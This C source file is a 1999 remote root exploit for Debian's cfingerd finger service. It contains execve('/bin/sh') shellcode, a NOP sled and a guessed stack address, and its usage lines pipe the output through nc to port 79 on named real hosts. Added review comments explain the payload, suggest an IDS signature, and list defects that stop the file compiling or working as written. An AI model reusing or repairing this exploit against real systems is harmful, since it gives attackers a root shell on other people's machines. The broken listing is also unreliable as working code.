/*
            - Imperfection Security Presents -     
         
       Debian GNU/Linux cfingerd remote root exploit
       From shakey, of Imperfection Security [07/99]
 
   Exploits a problem reported on BUGTRAQ in Debian's
   cfingerd. This exploit is remotely exploitable, and
   leaves the attacker a root shell on vulnerable systems.
   However, this attack is less susceptible to mass-probing
   from script kiddies due to the lack of a banner from the
   finger service ;D

   Affected Systems:
	+ Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2

   Greetings: dave, unknown, syntax, naptime, jaz, blitzed
              t0m, insane, DSC, short, vicci, crime, SDI
              ( nice shellcode generator ), phewl,  
              phenom, punish, kindred, tom-, justin
              
   Usage:
     IS-finger [offset]
     Example:	(./IS-finger 0; cat) | nc linux.org 79
*/

#include <stdio.h>

/*
 * Payload delivered after the NOP sled. The byte pattern (mov al, 0x0b;
 * int 0x80; the trailing "/bin/sh" string; a second int 0x80 after
 * xor ebx,ebx / inc eax) matches the classic 32-bit Linux x86
 * execve("/bin/sh") + exit() stub from the Phrack 49 article.
 *
 * NOTE(review): the initializer is missing its terminating ';' — as
 * published this file does not compile (the next token is `main`).
 *
 * Defensive note: a long run of 0x90 bytes followed by "/bin/sh" inside a
 * finger (TCP/79) request line is a strong, cheap IDS signature for this
 * class of payload; the sled/shellcode/return-address layout here is the
 * textbook stack-smash shape that NX stacks, ASLR and stack canaries were
 * introduced to defeat.
 */
char shellcode[] = 
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh"
 
/*
 * Builds a single overlong request line for the 1999 Debian cfingerd
 * overflow and writes it to stdout (the header comment pipes it into nc).
 * Layout: NOP sled (0x90), then `shellcode`, then a repeated little-endian
 * guess of the stack address `addr`.
 *
 * Pre-C99 implicit-int `main`; exit/atoi (stdlib.h), strlen (string.h) and
 * sleep (unistd.h) are all used without a prototype — only stdio.h is
 * included, so a modern compiler rejects this as-is.
 *
 * Review notes on the listing as published (documented, not repaired):
 *  - `host` is never declared, so `strlen(host)` does not compile.
 *  - The argc test is inverted: any argument prints usage and exits, while
 *    the no-argument path reads argv[1] (NULL) and passes it to atoi — UB.
 *  - The address-fill loop runs `while (x < 72)`, but x already equals
 *    bsize (~986) after the two preceding loops, so its body never executes.
 *  - buf is never NUL-terminated; the final printf("%s") reads past the
 *    bytes that were written.
 */
main (int argc, char *argv[]) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 int bsize=986;         /* total sled+payload length; shrunk by strlen(host) below */
 
 /* NOTE(review): this prints usage whenever an argument IS given. */
 if ( argc > 1) {
  printf ( "Imperfection Securities\' cfingerd exploit.");
  printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
  exit (0);
 }
  
 /* argc is always > 0 here, so argv[1] is read even when it is NULL. */
 if ( argc > 0) offset = atoi (argv[1]);

 /* Fixed pre-ASLR Linux 2.x stack address, nudged by the user offset. */
 addr = 0xbffff3c0 + offset; 
 
 bsize -= strlen ( host);   /* `host` is undeclared in this file */
 
 /* NOP sled: fill everything before the payload with 0x90. */
 for ( x = 0; x < bsize-strlen(shellcode); x++)
  buf[x] = 0x90;
 
 /* Copy the payload; x keeps advancing so it ends at bsize. */
 for ( y = 0; y < strlen(shellcode); x++, y++)
  buf[x] = shellcode[y]; 
 
 /* Intended to append `addr` as repeated little-endian dwords; with the
  * values above x > 72 on entry, so this loop does not run. */
 for ( ; x < 72; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }
        
 sleep (1);
 /* buf has no terminating '\0' — %s reads beyond the filled region. */
 printf ( "%s\r\n", buf);
}